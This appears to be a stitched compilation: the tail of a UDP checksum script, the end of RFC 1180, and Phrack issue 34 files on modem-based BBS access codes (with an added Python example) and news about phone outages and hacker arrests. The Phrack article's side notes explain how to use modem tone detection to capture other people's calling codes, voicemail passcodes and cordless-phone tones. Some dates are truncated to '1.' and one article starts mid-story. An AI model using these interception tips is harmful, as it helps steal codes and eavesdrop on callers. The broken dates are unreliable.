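    """
    total = ones_complement_sum(
        pseudo_header(src_ip, dst_ip, len(header_and_payload)) + header_and_payload
    )
    csum = (~total) & 0xFFFF
    return csum or 0xFFFF


def build_udp(src_ip: bytes, dst_ip: bytes, sport: int, dport: int,
              payload: bytes, with_checksum: bool = True) -> bytes:
    """Build a UDP datagram; with_checksum=False emulates a sender that skips it."""
    length = 8 + len(payload)
    header = struct.pack("!HHHH", sport, dport, length, 0)
    csum = udp_checksum(src_ip, dst_ip, header + payload) if with_checksum else 0
    return struct.pack("!HHHH", sport, dport, length, csum) + payload


def verify_udp(src_ip: bytes, dst_ip: bytes, datagram: bytes) -> str:
    """Receive-side rule from the tutorial: 'unchecked' (zero), 'ok' or 'bad'."""
    if len(datagram) < 8:
        return "bad"
    _sport, _dport, length, csum = struct.unpack("!HHHH", datagram[:8])
    if length != len(datagram):
        return "bad"  # length field disagrees with what IP delivered
    if csum == 0:
        return "unchecked"  # sender skipped the checksum; accepted without verifying
    # Summing the datagram with the checksum field left in place must give
    # all ones; a flipped bit anywhere in the covered bytes breaks that.
    total = ones_complement_sum(pseudo_header(src_ip, dst_ip, length) + datagram)
    return "ok" if total == 0xFFFF else "bad"


if __name__ == "__main__":
    src, dst = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])  # constructed addresses
    good = build_udp(src, dst, 1234, 53, b"hi")
    unchecked = build_udp(src, dst, 1234, 53, b"hi", with_checksum=False)
    corrupted = good[:-1] + bytes([good[-1] ^ 0x01])  # one payload bit flipped
    for name, dg in (("good", good), ("unchecked", unchecked), ("corrupted", corrupted)):
        field = struct.unpack("!H", dg[6:8])[0]
        print(f"{name:>10}: checksum=0x{field:04x} -> {verify_udp(src, dst, dg)}")
```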
8.4 NFS

Network File System, first developed by Sun Microsystems Inc, uses UDP and is excellent for mounting UNIX file systems on multiple computers. A diskless workstation can access its server's hard disk as if the disk were local to the workstation. A single disk copy of a database on mainframe "alpha" can also be used by mainframe "beta" if the database's file system is NFS mounted on "beta"; programs on "beta" then use ordinary file commands to use the NFS mounted disk as if it were local disk.

8.5 SNMP

Simple Network Management Protocol (SNMP) uses UDP and is designed for use by central network management stations. It is a well known fact that if given enough data, a network manager can detect and diagnose network problems. The central station uses SNMP to collect this data from other computers on the network. SNMP defines the format for the data; it is left to the central station or network manager to interpret the data.

8.6 X-Window

The X Window System uses the X Window protocol on TCP to draw windows on a workstation's bitmap display. X Window is much more than a utility for drawing windows; it is an entire philosophy for designing a user interface.

9. Other Information

Much information about internet technology was not included in this tutorial. This section lists information that is considered the next level of detail for the reader who wishes to learn more.

o administration commands: arp, route, and netstat
o ARP: permanent entry, publish entry, time-out entry, spoofing
o IP route table: host entry, default gateway, subnets
o IP: time-to-live counter, fragmentation, ICMP
o RIP, routing loops
o Domain Name System

10. References

[1] Comer, D., "Internetworking with TCP/IP Principles, Protocols, and Architecture", Prentice Hall, Englewood Cliffs, New Jersey, U.S.A., 1988.

[2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN Network Information Center, SRI International, 333 Ravenswood Avenue, Room EJ291, Menlo Park, California, U.S.A., 1985.
[3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.

11. Relation to other RFCs

This RFC is a tutorial and it does not UPDATE or OBSOLETE any other RFC.

12. Security Considerations

There are security considerations within the TCP/IP protocol suite. To some people these considerations are serious problems, to others they are not; it depends on the user requirements. This tutorial does not discuss these issues, but if you want to learn more you should start with the topic of ARP-spoofing, then use the "Security Considerations" section of RFC 1122 to lead you to more information.

13. Authors' Addresses

Theodore John Socolofsky
EMail: TEDS@SPIDER.CO.UK

Claudia Jeanne Kale
EMail: CLAUDIAK@SPIDER.CO.UK

Note: This info taken from RFC-1180.
_______________________________________________________________________________

                              ==Phrack Inc.==

                 Volume Three, Issue Thirty-four, File #9 of 11

        ._._._._._._._._._._._._._._._._._._._._._._._._.
        !                                               !
        !     Advanced Modem-Oriented BBS Security      !
        !                                               !
        !         By Laughing Gas and Dead Cow          !
        !                                               !
        !    Written Exclusively for PHRACK 8/22/91     !
        !_._._._._._._._._._._._._._._._._._._._._._._._!

* Introduction =-= Things you need to know *

This is an introduction and guide to setting up your BBS and modem so that a caller must know a certain code and append it to his dialing string in order to access the BBS. This lets you have yet another way (besides newuser passwords, etc) to lock out unwanted callers. You can also set a certain pattern for your board's numerical code based on the day or the month or something, and distribute this pattern instead of having to distribute the access code.

You must have an intelligent modem to be able to run a board which requires the access method I'm going to be discussing in this file. However you don't need an intelligent modem to be able to call the same board, but you do have to enter the code manually if you do not have an intelligent modem.
(So only certain people can run a board with this method of access control, but >almost< anyone can call one.)

All modem commands in this manual will be hayes 'AT' style commands, and some may be available only to USRobotics Courier modems with v.42bis, or certain other intelligent modems. If you can't get it to work with your modem, your modem may not be able to do it, but try looking in your modem manual, just in case.

NOTE: The ONLY modem that this method has been tested with is a USRobotics Courier HST modem, (the new kind) with the v.42bis. I tested it with my modem which is an older HST (14.4, but no v.42bis) and it did NOT accept the AT%T command (it returned "ERROR"). Check page 83 of your HST manual for more info, or type AT%$ for on-line help from the modem firmware. (about as helpful as the manual, and neither are very detailed.)

Things to know:

ATDT1234567;       This command causes your modem to dial 1234567 and then
                   return to command mode.

ATDT1234567@1;     This command causes your modem to dial 1234567, wait for
                   an answer, dial 1 and return to command mode.

|-----> AT%T       This command causes every tone that goes into the modem
|                  to be identified and followed with a 0.
|
|---------------------- This is the key to the whole enchilada.

Alternate commands may be available depending on your modem type.

* Concept =-= How-To *

The concept for the bbs access code would be as follows. The caller dials the number to the BBS; when the BBS picks up, it sends a digit, then the caller sends a responding set of digits. If the digits which the caller sends match the access code for the BBS, the BBS will send an answer tone and the caller's modem will acknowledge and connect.
How it works is like this:

(Sample Transcript)

CALLER> ATDT1234567@234
BBS> RING
BBS> ATDT1;
BBS> OK
BBS> AT%T
BBS> 203040
BBS> ATA

What happens is this: the caller dials 1234567 (the number of the BBS). The '@' tells the caller's modem to wait for a result (which is received when the BBS gets a ring and sends a 1); then the caller's modem dials 234 (the access code). After the BBS sent the '1' it got an OK, so it sent an AT%T which told it to monitor tones. This command returned "203040", which is 234 followed by 0's (the format of the output of AT%T); the BBS software would have to watch for this string. Since 234 was the right code, the board sent an ATA which would connect the caller since its dial command was still open. If 234 hadn't been the code, then the BBS would have sent an ATH0.

* Manual Dialing =-= Lame modems *

Anyway, if you don't have a modem that does the AT%T or ATDT1; commands you CANNOT run a BBS with this type of security, unless your modem has EQUIVALENT commands, or you can figure out a way to do it with the commands your modem has. The toughest part is the reading of tones, which, as far as I know, is unique to the HST/Courier modems.

However, if your modem does not do the ATDT1@1 thing, then you can PROBABLY still call a board using this security. This is assuming you can just send a "dial command" to your modem without a number (ie ATD on an HST.) What you do is dial the BBS number manually, then you'll hear a beep, you dial the code, then send the dial command to your modem and put the phone down. This should connect you in the same fashion.. (ie..)

CALLER> manually dials BBS
BBS> ATDT1;
CALLER> hears beep and dials 234, then sends ATD to his modem and puts the
        phone down.
BBS> OK
BBS> AT%T
BBS> 203040
BBS> ATA
CALLER> his modem connects.

* Bells and Whistles =-= Wrapping It Up *

Your options when using this type of security. There are many different things you can do.
Method #1: You can say "Hey, the access code for my board is 234" and give that to the people you want to call.

Method #2: Set a pattern for your access codes. Say, the date (ie, for today, 8-22-91 the code would be 082291), or you could get more complex (add one to each digit, run it through an algorithm, etc)

Method #3: Distribute a program that generates the code based on the day, the month, what have you. (However this is only a solution if you can either distribute a program like this to EVERY type of operating system, or you only want callers from one operating system (or several, the only ones you can produce it for..)

Method #4: Have the BBS accept several codes, and give out a different code to each class of users (say, newusers to apply = 1234, validated = 2345, elite = 3456) or something like that. This would allow for control of who calls when, as well as logging of call class frequency, etc.

Method #5: Have a specific code for each user. This would take a lot of maintenance, but would provide for a VERY secure BBS environment. This would allow the same advantages above as well (logging, freq. etc).

Things to keep in mind, however: if you have an access code generated by a program or by the date, etc. you have to change the code whenever the program would.

An interesting side note here is that the AT%T command can be used to call a COCOT (private payfone) and record the tones, or possibly to record codes other people entered, etc. (Ie, bring your laptop with modem to a office, attach it to an extension and wait for a person to pick up, issue the ATD; command right away, then AT%T command. If the person dials a 950, you should get something like 90500010003030 (pause) 203040506070 that is assuming the code is 234567. Congratulations, you now have their code. The modem can recognize the dtmf tones for 0-9, *, #, and the silver box tones A, B, C, and E.
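The BBS side of the sample transcript in the Concept section, combined with the date pattern of Method #2 and the per-class codes of Method #4, as an added example that is not the authors' or Phrack's code. The serial port is replaced by a scripted stand-in so it runs offline; it assumes, as the text states, that AT%T reports each recognized tone followed by a '0' (so "203040" is the code 234) and that the board answers with ATA or hangs up with ATH0.

```python
"""BBS-side access-code check for the AT%T dial-in scheme (added example)."""
import datetime
import hmac
from typing import List, Optional, Tuple

# 234 is the code from the sample transcript; the rest are the Method #4
# sample values (newusers to apply, validated, elite).
CLASS_CODES = {
    "member": "234",
    "newuser": "1234",
    "validated": "2345",
    "elite": "3456",
}


def decode_tone_report(report: str) -> str:
    """Turn an AT%T result such as '203040' into the dialed digits '234'.

    The modem emits every recognized tone followed by a '0', so the dialed
    symbols sit at the even positions and every odd position must be '0'.
    A dialed 0 therefore shows up as '00'.
    """
    if not report or len(report) % 2:
        raise ValueError("tone report has odd length")
    if any(ch != "0" for ch in report[1::2]):
        raise ValueError("tone report has a non-zero separator")
    return report[0::2]


def date_code(day: datetime.date) -> str:
    """Method #2 pattern: the date as MMDDYY, e.g. 8-22-91 -> '082291'."""
    return day.strftime("%m%d%y")


def classify_caller(dialed: str, day: datetime.date) -> Optional[str]:
    """Map the dialed digits to an access class, or None to hang up.

    hmac.compare_digest keeps the comparison time independent of how many
    leading digits matched, so a wrong code takes as long as a nearly right one.
    """
    if hmac.compare_digest(dialed, date_code(day)):
        return "date"
    for cls, code in CLASS_CODES.items():
        if hmac.compare_digest(dialed, code):
            return cls
    return None


class ScriptedModem:
    """Constructed stand-in for the modem: canned responses, logged commands."""

    def __init__(self, responses: List[str]) -> None:
        self.responses = list(responses)
        self.sent: List[str] = []

    def read(self) -> str:
        return self.responses.pop(0) if self.responses else ""

    def write(self, command: str) -> None:
        self.sent.append(command)


def answer_call(modem: ScriptedModem, day: datetime.date) -> str:
    """Run the BBS side of the sample transcript and return the outcome.

    RING -> ATDT1; (send the prompt digit, stay in command mode) -> AT%T
    (read the caller's digits) -> ATA if the code is accepted, ATH0 otherwise.
    """
    if modem.read() != "RING":
        return "no call"
    modem.write("ATDT1;")
    if modem.read() != "OK":
        modem.write("ATH0")
        return "modem error"
    modem.write("AT%T")
    try:
        dialed = decode_tone_report(modem.read())
    except ValueError:
        dialed = ""  # a garbled report never matches any code
    access = classify_caller(dialed, day)
    if access is None:
        modem.write("ATH0")
        return "rejected"
    modem.write("ATA")
    return access


def simulate(report: str, iso_day: str = "1991-08-22") -> Tuple[str, List[str]]:
    """One scripted call: the AT%T report to feed the board, and what it sent."""
    modem = ScriptedModem(["RING", "OK", report])
    outcome = answer_call(modem, datetime.date.fromisoformat(iso_day))
    return outcome, modem.sent


if __name__ == "__main__":
    for report in ("203040", "008020209010", "10203040", "9090", "2030401"):
        outcome, sent = simulate(report)
        print(f"{report:>14} -> {outcome:>8}  modem commands: {sent}")
```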
I'm sure other interesting uses for this feature can be found, and I'd love to hear from the other people out there in the h/p world. I'm sure a lot of you have seen me around, for those that haven't I can be reached on my board, Solsbury Hill or Ripco (312) or on Internet as lgas@doomsday.spies.com. (Note: Spies is down as of this writing, I have some other accounts, but I'd prefer that most of them remain unknown... if anyone wants to offer me an account I can use just for mail where I can have my alias for the account name, on a stable system, please contact me.)

* Non-BBS Oriented Stuff =-= Conclusion *

In some issue of 2600 magazine someplace at some time they published an article on how to build a tone detection device: Now you have your own, built in to the modem. An example application of this "in the field" would be calling a COCOT and using the modem to decipher the tones. That would be done:

ATDT3014283268;      ;call the COCOT
AT%T                 ;get tones

it should respond with the decoded tones.

You could fool around with it and get it to accept input from a tape recorder, this gives you a way to decipher recorded VMB passcodes, or phone numbers, or anything else that was recorded as it was dialed. Or use it with a radio scanner set to scan the freqs that cordless fones operate on, and record those tones. Then play 'em back into the modem and they're yours.

In conclusion... (ahem).. This is an area which I believe has never been breached before, and this idea was brought to you by THUGS. As long as technology keeps advancing, we'll be here to bring you the latest tricks such as this one. Please contact me if you have any information about this area (tone detection via modem, or anything relating to it at all..) especially if you know of modems besides the v.42bis models of USRobotic's HSTs that can do this.
Laughing Gas
Solsbury Hill BBS (301-428-3268)
_______________________________________________________________________________

                              ==Phrack Inc.==

                Volume Three, Issue Thirty-Four, File #10 of 11

 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
 PWN                                                         PWN
 PWN                   Phrack World News                     PWN
 PWN                                                         PWN
 PWN                Issue XXXIV / Part One                   PWN
 PWN                                                         PWN
 PWN                 Compiled by Dispater                    PWN
 PWN                                                         PWN
 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

What We Have Got Here Today is Failure to Communicate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Editor's Comment: Dispater

With hundreds, maybe thousands of lives at stake, three airports in New York had to shut down due to a long distance carrier failing. It is absolutely amazing how irresponsible these services were to rely on only one form of communication. Where was the back up system? This incident might not have happened if they would have had an alternative carrier or something as simple as two way radios.

Many people are running around these days screaming about how irresponsible AT&T was. The real problem lies with people in our society failing to take the time to learn fundamental aspects of the common technology. It is also a shame that the people "in control" were incapable of using something as simple as a "port" to dial through another extender. This is the kind of thing that happens when people choose to isolate themselves from the technological society we have today.

What follows is a compilation of several articles dealing with AT&T long distance carrier failures.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Thank You for abUsing AT&T                                  October 18, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~
by Kimberly Hayes Taylor and Steve Marshall
(USA Today "Phone Failure Stalls Air Traffic Disruption in N.Y. Felt Nationwide")

Air traffic in and out of New York City resumed late Tuesday after a phone-service failure virtually shut down three airports for almost four hours.
Hundreds of flights coast to coast were delayed or canceled when controllers at John F. Kennedy, La Guardia and Newark (New Jersey) airports lost the link that allows communication among themselves or with other U.S. airports. Communications between pilots and air-traffic controllers travel over telephone lines to ground-based radio equipment.

AT&T spokesman Herb Linnen blamed an internal power failure in a long-distance switching office in Manhattan.

Hours after the 4:50 PM EDT failure, 40 planes loaded with passengers were sitting on the runway at Kennedy, 35 at Newark, 30 at La Guardia.

"During the height of the thing, at least 300 aircraft were delayed at metropolitan airports," said Bob Fulton, a spokesperson for the Federal Aviation Administration. Included: flights taking off "from California to Florida" and headed for New York, said FAA's Fred Farrar.

Farrar said planes had to be grounded for safety. Without telephone communication, they would "fly willy-nilly."

Among diverted flights: a British Airways supersonic Concorde from London, which landed at Bradley airport outside Hartford, Conn.

Passenger reaction: at Washington's National Airport, Dominique Becoeur of Paris was "reading, drinking, and thinking" while waiting for a flight to New York. At La Guardia, Ernie Baugh, of Chattanooga, Tenn., said, "I think I will go and have another beer."

Flights were reported resuming by 9 p.m. EDT. Linnen said AT&T was busy Tuesday night restoring long-distance service in and out of New York City, which had been interrupted. Some international service also had been affected.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

AT&T's Hang Ups                                             October 19, 1991
~~~~~~~~~~~~~~~
By John Schneidawind
(USA Today - "The Big Hang-Up Phone Crash Grounds Airplanes, Raises Anger")

The Federal Aviation Administration has some good news for travelers who were stranded at airports, or delayed for hours, the past two days by the New York City telephone outage. If a similar phone disaster strikes next month, hardly any fliers will know the difference.

That's because AT&T is close to completing installation of a network of microwave dishes that will supplement, if not replace, the phone lines AT&T uses to relay calls between air-traffic controllers in different cities.

Tuesday evening, flights in and out of some of the nation's busiest airports - Kennedy, La Guardia, and Newark, N.J. - were grounded because FAA controllers couldn't communicate with one another.

For much of the 1980's, land-based fiber optic lines have been slowly replacing microwave phone dishes phone companies long have used to transmit telephone calls. That's because fiber-optic wires were thought to provide clearer calls than microwave technology.

Now, it's becoming apparent that sending some or most telephone calls via wireless microwave might ease the burden handled by fiber-optic cables. In addition, a microwave call could be transmitted point-to-point, bypassing an inoperative switching center when a breakdown or catastrophe occurs.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Computer Maker Says Tiny Software Flaw Caused Phone Disruptions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Edmund L. Andrews (New York Times)

WASHINGTON -- A manufacturer of telephone call-routing computers said that a defect in three or four lines of computer code, rather than a hacker or a computer "virus," appeared to be the culprit behind a mysterious spate of breakdowns that disrupted local telephone service for 10 million customers around the country in late June and early this month.

In congressional testimony Tuesday, an official of the manufacturer, DSC Communications of Plano, Texas, said all the problems had been traced to recent upgrades in its software, which had not been thoroughly tested for hidden "bugs." Although the telephone companies that experienced failures were using slightly different versions of the software, the company said, each version was infected with the flaw.

"Our equipment was without question a major contributor to the disruptions," Frank Perpiglia, DSC's vice president for technology and product development, told the House telecommunications subcommittee. "We must be forthright in accepting responsibility for failure."

Officials at both DSC and the regional Bell companies said they could not entirely rule out the possibility of sabotage, but said the evidence points strongly to unintentional errors. The flaws caused the computers to send a flood of erroneous messages when the computer encountered routine maintenance problems.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

TELEPHONE TECHNOLOGY QUESTIONED AFTER FAILURES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Edmund L. Andrews (New York Times)

WASHINGTON -- Striking similarities between nearly simultaneous computer malfunctions that disrupted local telephone service on the East Coast and in Los Angeles on Wednesday have raised questions among communications experts about the reliability of advanced networks that all the Bell telephone companies are now installing.

The problems experienced by both Pacific Bell and the Chesapeake and Potomac Co., which serves Washington, Maryland, Virginia and parts of West Virginia, involved computer programs on advanced call-routing equipment, which uses the same new technology, one being adopted throughout the communications industry.

The problems, which were corrected in both areas by early evening on Wednesday, made it impossible for about nine million telephone customers to complete local telephone calls.

Although the origins of both malfunctions remained unclear on Thursday, the difficulties at the two companies bore a strong resemblance to a brief but massive breakdown experienced by the American Telephone and Telegraph Co.'s long-distance lines in January 1990. In all three cases, a problem at one switching center quickly corrupted other switches and paralyzed much of the system.

Perhaps the biggest fear, federal regulators say, is that as telephone companies link their networks more closely, malfunctions at one company can infect systems at other companies and at long-distance carriers.

"What you want to avoid is the situation where one system contaminates another," said an investigator at the Federal Communications Commission who insisted on anonymity. "I guess the ultimate concern is that software or hardware would be deployed in a way that the corruption could be processed through entire network, and there would be no alternatives available."
As the telephone companies and government regulators tried to determine more precisely on Thursday what went wrong, investigators at the communications commission said they would also look at several other questions: Are there system wide problems that have gone unnoticed until now? Can telephone companies reduce risks by reducing their dependence on one type of switching equipment? Were the disruptions caused by computer operators outside the telephone companies trying to sabotage the systems?

Officials at both companies discounted the possibility that a computer hacker might have caused the failures, and outside experts tended to agree.

"There's always that possibility, but most likely it was some kind of glitch or bug in the software," said A. Michael Noll, a professor at the Annenberg School of Communications at the University of Southern California and author of several textbooks on telecommunications technology.

Several independent communications experts said the problems reflected the difficulty of spotting all the hidden problems in complex software before putting it into commercial use.

"It's very hard to simulate all the possibilities in a laboratory," said Richard Jay Solomon, a telecommunications consultant and research associate at the Massachusetts Institute of Technology. "You have to go out in the field and keep your fingers crossed."

As more information became available on Thursday, the two disruptions appeared to be almost identical.

The problem at Chesapeake & Potomac, a subsidiary of the Bell Atlantic Corp., began as the company was increasing the traffic being routed by one of its four signal processing computers. For reasons that remain a mystery, the system began to malfunction about 11:40 a.m. The computer was supposed to shut itself down, allowing the traffic to be handled by other computers. Instead, it sent out a barrage of erroneous signals, apparently overwhelming the other two computers.

"It was as if bogus information was being sent," said Edward Stanley, a company spokesman.

The same thing seems to have occurred almost two hours later, at about 11 a.m., in Los Angeles, said Paul Hirsch, a spokesman for Pacific Bell, a subsidiary of the Pacific Telesis Group. Hirsch said the problem began when one of four signal transfer points signaled to the others that it was having problems. The other three computers froze after being overloaded by signals from the defective computer.

Hirsch said his company continued to believe that the two telephone incidents were completely unrelated. "Someone wins the lottery every week," he said. "Stranger things can happen."

Officials at Chesapeake and Potomac said the problems were probably unrelated. Asked if hackers could have caused the problems, Ellen Fitzgerald, a spokeswoman for Chesapeake and Potomac, said she had been assured that the system could not be penetrated. But, she added, "a few days ago I would have told you that what happened yesterday wouldn't happen."

Terry Adams, a spokesman at the DSC Communications Corp., which made both systems, said company officials also discounted any connection between the failures.
______________________________________________________________________________

                              ==Phrack Inc.==

                Volume Three, Issue Thirty-four, File #11 of 11

 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
 PWN                                                         PWN
 PWN                   Phrack World News                     PWN
 PWN                                                         PWN
 PWN                Issue XXXIV, Part Two                    PWN
 PWN                                                         PWN
 PWN                 Compiled by Dispater                    PWN
 PWN                                                         PWN
 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Mind Rape or Media Rape?
~~~~~~~~~~~~~~~~~~~~~~~
Special Thanks: Night Ranger

Thursday September 26, 1991 was no ordinary day for Mind Rape, a young Arizona State college student. When he finally made it home that day, he found his home had been raided by the feds. 'They took EVERYTHING! Including my Metallica tape!' he told me. After talking to him for quite a while I learned a lot, not just about his bust but about hacking in general.
He instructed me not to say anything specifically on the advice of his lawyer and the EFF, but he did want me to let the real reason he was busted be known - His electronic newsletter entitled NSA (for National Security Anarchists). Mind Rape has some very important views on hacking that the government doesn't want others to hear. Some of these views were contained in his newest and soon to be released newsletter NSA issue number five, which was confiscated of course. He was also working on a book about hacker's philosophy, which was taken too. He has not yet been charged but in the eyes of the media he has already been tried and found guilty. It is unfortunate the general public gets its information from news reports like the following because, as you can see, they can be quite misleading. Hopefully once Mind Rape gets everything straight he will continue to write his book, after all it is his constitutional right to do so, and I think it would be quite informative to both the hackers of the nineties and the outside world.

The following is a transcript of a news report covering his story...

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Male Announcer: That student is Donald _____ of Phoenix. Officials of LDL Long Distance believe he's one of around 20 hackers who've been ripping off their company for fun and profit. In tonight's Night Team Report we'll see how this kind of thievery adds up. The nation's telephone companies lose more than a billion dollars a year to hackers. Mark Nighten (sp?) a security director for LDL Long Distance. Last month he was poring through records like these which convinced him to believe that someone was making hundreds of computer generated phone calls to his company's 1-800 access line trying to get customers' calling card codes. He went to the Phoenix Police. They got a search warrant and traced the calls to a house near 18th Drive near Union Hills.
Police went there last month and came away with a computer, software and a list of phone codes, all belonging to 19 year old Donald _____, an ASU student. Nighten suspects _____ is just one of 20 hackers on his network who can make thousands of dollars worth of calls which would wind up on other people's phone bills.

Mark: You can see the magnitude of this. Off of one authorization code you could have 10, maybe 150 other people...

Male Announcer: Lemme ask ya...How bad are you getting ripped off here?

Mark: We've had to have somebody on this 24 hours a day. We've been getting killed.

Male Announcer: Hackers often sell the codes they steal to other students. So that hundreds of students at Arizona State University and University of Arizona also could be ripping off the company. Students at Arizona State University told me today that they have not heard of LDL's troubles, but they confirmed that stolen phone codes do have a way of getting around.

I iz a College Student: Someone hears...ya know...about the interest and someone else knows somebody...ya know...and they tell you and you talk to them and...ya know...it's not overly expensive or anything like that.

Male Announcer: Dr. Dan Kneer of Arizona State University's School of Business is a nationally recognized expert on computer crime. [who?] He contends that hacking is mushrooming.

Dr. Dan: The problem that I see is that these people philosophically don't see this as a crime. For most of them this is an intellectual challenge.

Male Announcer: That challenge led Dutch students to break into a United States Army Computer during operation desert storm. And as this Japanese documentary shows, it led hackers in New York City to use payphones to commit big time rip-offs. Now it's important to point out that Donald ______, that Arizona State University student, has not yet been charged with any crime and if he is charged he is innocent until proven guilty.

Female announcer: What is the penalty for hacking?
Male Announcer: Just for getting into a system when you're not supposed to can be up to a year and a half in prison. But if there is criminal intent to steal, to rip-off that system, the penalty can be as high as 10 years in jail and a $150,000.00 fine.
_______________________________________________________________________________

Computer Hacker Gets Probation                             September 26, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special Thanks: Flaming Carrot
(Pittsburgh Post-Gazette)

A Mt. Lebanon woman who was able to make thousands of free long-distance telephone calls by breaking into voice mail boxes with a touch tone telephone has been placed on 10 years probation.

Last Friday, Common Pleas Judge Robert E. Dauer ordered Andrea Gerulis, 20, of Castle Shannon Boulevard to make restitution of $4,300 to Magee Womens Hospital and $2,516 to Pittsburgh Cellular Telephone Co.

Gerulis, a Mt. Lebanon High School graduate, was a computer hacker who entered telephone computer systems illegally so that she could make telephone calls without paying for the service.

Mt. Lebanon police Detective John L. Michalec posed as a computer hacker and spent nine months investigating her activities, which were done by dialing codes on a touch-tone telephone.

After a non-jury trial in May, Dauer convicted her of two counts of theft of services and two counts of unlawful use of computers.

Assistant District Attorney Thaddeus A. Dutkowski recommended probation because he didn't want Gerulis to go to jail, where she could teach inmates how to commit crimes with a telephone. If she were incarcerated, she would have the largest classroom environment she could hope for, Dutkowski said. Dauer agreed that inmates already know too much about committing crimes with telephones.

Gerulis told Dauer that she was sorry for what she did, that when she started, she was doing it for fun. She was also ordered to continue psychological counseling.
_______________________________________________________________________________

More Archaic Government Regulations Proposed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special Thanks: Stainless Steal Provider
(New York Times)

The federal government said Thursday that it would introduce a standard for authenticating electronic data later this summer, but the announcement prompted an angry reaction from one of the leading private providers of software that protects computer data.

The company, RSA Data Security Inc. of Redwood City, Calif., said the government had failed to address fears about the possibility of a secret "trap door," which would permit intelligence and law-enforcement agencies to look at private data.

The issue of providing special mechanisms to permit government access to private information has caused a growing public debate recently. Earlier this year an anti-terrorism bill introduced in Congress called on the computer and telecommunication industries to permit federal agencies to look at private data. But the statement was later dropped from the bill after extensive public opposition.

Government officials said that it would be possible for technical experts to examine the standard when it is released this summer and they could decide for themselves whether there were any shortcomings in the design of the standard.

"It will be openly published and people can inspect it to their heart's content," said James H. Burrows, head of the computer systems laboratory at the National Institute of Standards and Technology.

He added that the new standard was not intended to encrypt computer data, and that the government would continue to rely on an earlier technology known as the Data Encryption Standard to actually hide information from potential electronic eavesdroppers. Burrows said there was a project under way to develop a successor to that standard, but that it was years away from completion.
______________________________________________________________________________

Computer Whiz Accused Of Illegal Access and Mischief          September 25, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Peter G. Chronis (The Denver Post Page 1 "NASA vs. Hobbyist")

An Aurora computer hobbyist who allegedly used a personal computer and his home phone to penetrate NASA computers hacked off Uncle Sam enough to be indicted on seven federal counts yesterday.

Richard G. Wittman, 24, the alleged "hacker," was accused of two felonies, including gaining unauthorized access to NASA computers to alter, damage, or destroy information, and five misdemeanor counts of interfering with the government's operation of the computers.

Wittman allegedly got into the NASA system on March 7, June 11, June 19, June 28, July 25, July 30, and Aug. 2, 1.

Bob Pence, FBI chief in Denver, said Wittman used a personal computer in his home and gained access to the NASA systems over telephone lines.

The investigation, which took more than a year, concluded that Wittman accessed the NASA computer system and agency computers at the Marshall Space Flight Center in Huntsville, Alabama, and the Goddard Space Flight Center in Greenbelt, Maryland.

The NASA computers are linked to a system called Telenet, which allows qualified people to access government data bases. A user name and password are required to reach the NASA computers.

Federal sources declined to reveal more information because the complex case involves "sensitive material."

Wittman, a high-school graduate, apparently hadn't worked in the computer industry and held a series of odd jobs.

The felony counts against him each carry a possible five-year prison term and $250,000 fine.
_______________________________________________________________________________

Security Increases
~~~~~~~~~~~~~~~~~
Special Thanks: Stainless Steal Provider (New York Times)

The foundation was started by Richard Stallman, who was awarded a MacArthur Foundation fellowship in 1. While mainstream software companies have prohibited users from freely copying their programs, Stallman, who is widely respected for developing computer languages and software editing tools, has argued that information is not the same as other commodities and should be shared without cost.

His password has been widely known among network users because he has refused to keep it secret. He is bitter about the changes that have accompanied the coming of age of computer networks.

Last month, after security was increased at the foundation and many users were stripped of their guest privileges, Stallman said he considered giving up his quest. In the end, he decided that the cause of creating free software was too important to abandon, but he said he feels like a pariah.

"Since I won't agree to have a real password, I will only be able to log in on the 'inside' machines," he wrote in an electronic message in response to a reporter's query. "I still feel partly ashamed of participating in this. I've been forced to choose between two principles, both of which are so important to me that I won't accept the loss of either of them."

Idealists like Stallman and Ted Nelson, the author of the cult classic "Computer Lib," hoped that the computer revolution wouldn't be like the industrial revolution. This time the wealth -- information -- would be free to everyone and instant communication would break down the barriers between rich and poor and remake mankind.

Marvin Minsky, a computer science professor at MIT, said that for 15 years, beginning in 1963, researchers at the school lived in a paradise, sharing computers and networks before a system of password protection was installed. Now that has changed.
"It's sad," he said. "But Richard Stallman is living in a dream world. He has this view that his idea of computer ethics will prevail. But it's not going to happen this year or next."

Instead of finding community on computer networks, many users are now confronted with virus invasions and information theft, leading to the same sense of alienation and fear felt by residents of large cities.

"At first I thought this was Marshall McLuhan's global village coming to reality," said Neil Harris, a manager at General Electric Information Services Co., which sets up computer conferences and sells information to about 200,000 members around the world. "But it's not that at all. It's a lot of people connecting in hundreds of small communities based around highly specific interests."

Steven Levy, who has written about the early days of computing at MIT, said that the demise of the Free Software Foundation's open door policy was inevitable.

"When you pass the plate around in church you don't expect people to steal from it," he said. "But sooner or later everyone knows that the plate is unguarded, and there are always people who don't care about the church. The question is how far do you go to protect it? Do you lock the church or do you send an armed guard around with the plate?"

______________________________________________________________________________

PWN Quicknotes
~~~~~~~~~~~~~

